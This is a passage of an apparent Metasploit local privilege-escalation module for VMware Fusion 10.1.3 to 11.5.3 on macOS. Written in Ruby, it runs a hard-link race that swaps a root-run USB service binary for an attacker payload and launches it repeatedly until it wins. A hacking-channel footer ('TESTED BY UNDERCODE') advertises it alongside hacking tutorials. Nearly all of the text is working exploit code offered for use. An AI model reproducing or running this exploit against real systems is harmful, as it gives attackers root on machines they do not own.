ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"

# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name

print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results

print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end

def check
unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
print_bad "'#{open_usb_service}' binary missing"
return CheckCode::Safe
end
version = get_version
if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
vprint_good "Vmware Fusion #{version} is exploitable"
else
print_bad "VMware Fusion #{version} is NOT exploitable"
return CheckCode::Safe
end
CheckCode::Appears
end

def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end

# Make sure we can write our payload to the remote system
rm_rf content_dir # live dangerously.
if directory? content_dir
fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
end
cmd_exec "mkdir -p #{base_dir}"
register_dirs_for_cleanup content_dir
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable."
end

version = get_version
if version == Gem::Version.new('11.5.3')
vprint_status 'Using 11.5.3 exploit'
exactly_11_5_3
elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
vprint_status 'Using pre-11.5.3 exploit'
pre_11_5_3
end
rm_rf content_dir # live dangerously.
end
end

🦑TESTED BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 VMWARE EXPLOIT TESTED BY UNDERCODE

Undercode is ready to start training in leb after corona situations, :)

🦑 ANDROID HACKING & SECURITY TUTORIALS BY UNDERCODE